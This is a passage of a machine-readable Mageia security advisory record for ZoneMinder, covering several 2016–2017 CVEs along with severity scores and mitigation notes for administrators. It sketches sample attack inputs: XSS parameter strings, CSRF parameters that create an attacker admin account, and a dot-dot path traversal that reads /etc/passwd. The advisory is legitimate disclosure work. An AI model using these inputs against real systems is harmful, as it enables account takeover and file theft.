view=events&filter;[terms][1][cnj]=and[XSS] view=events&filter;%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter;%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit;=1%22%3E%3C/a%3E[XSS] (among others). (CVE-2017-5367) ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, is vulnerable to CSRF (Cross Site Request Forgery) which allows a remote attack to make changes to the web application as the current logged in victim. If the victim visits a malicious web page, the attacker can silently and automatically create a new admin user within the web application for remote persistence and further attacks. The URL is /zm/index.php and sample parameters could include action=user uid=0 newUser[Username]=attacker1 newUser[Password]=Password1234 conf_password=Password1234 newUser[System]=Edit (among others). (CVE-2017-5368) A file disclosure and inclusion vulnerability exists in web/views/file.php in ZoneMinder 1.x through v1.30.0 because of unfiltered user-input being passed to readfile(), which allows an authenticated attacker to read local system files (e.g., /etc/passwd) in the context of the web server user (www-data). The attack vector is a .. (dot dot) in the path parameter within a zm/index.php?view=file&path;= request. (CVE-2017-5595) A Cross-Site Scripting (XSS) was discovered in ZoneMinder 1.30.2. The vulnerability exists due to insufficient filtration of user-supplied data (postLoginQuery) passed to the \"ZoneMinder-master/web/skins/classic/views/js/postlogin.js.php\" URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. (CVE-2017-7203) Notes for sysadmins: 1\\. CRSF attacks are now blocked by setting the ZoneMinder variable 'ENABLE_CSRF_MAGIC' to 'yes'. During system update you may want to check that this variable is set. In Mageia 'yes' is the default for new installs of ZoneMInder. 2\\. Changes have been made to /etc/httpd/conf/site.d/zoneminder.conf to mitigate CVE-2016-10140. Make sure to accept the new configuration when updating existing systems. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-10T02:05:58", "type": "mageia", "title": "Updated zoneminder packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10140", "CVE-2016-10201", "CVE-2016-10202", "CVE-2016-10203", "CVE-2016-10204", "CVE-2016-10205", "CVE-2016-10206", "CVE-2017-5367", "CVE-2017-5368", "CVE-2017-5595", "CVE-2017-7203"], "modified": "2017-06-10T02:05:58", "id": "MGASA-2017-0162", "href": "https://advisories.mageia.org/MGASA-2017-0162.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
CVE-2017-5367
